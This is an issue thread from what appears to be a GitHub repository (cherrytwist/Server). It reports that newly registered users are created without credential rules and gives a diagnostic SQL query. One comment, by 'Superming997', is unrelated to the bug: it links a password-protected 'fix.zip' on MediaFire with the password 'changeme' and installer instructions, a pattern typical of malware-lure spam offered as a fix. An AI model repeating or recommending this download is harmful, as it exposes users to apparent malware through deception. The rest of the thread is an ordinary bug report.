### ISSUE TITLE
BUG: Registering new user is created without credentials

### ISSUE THREAD

**Issue by Comoque1** [cherrytwist/Server#4469]
**Describe the bug**

**To Reproduce**
1. Go to localhost
2. Register new user
3. After finishing the flow, check the credential rules table - the newly registered user doesn't have credential rules
```
SELECT email, credentialRules, authorizationId FROM alkemio.authorization_policy 
join user on authorization_policy.id = user.authorizationId
where credentialRules = '';
```
<img width="1292" src="https://api.zenhub.com/attachedFiles/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaHBBNEtJQmc9PSIsImV4cCI6bnVsbCwicHVyIjoiYmxvYl9pZCJ9fQ==--153a160a6ba8ad3d72fcabb05c97ccbc2603b1d9/image.png" alt="image.png" />

**Expected behavior**
When new user is registered, credential rules are set.

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Comoque1** [comment]
Tested OK on ACC env.
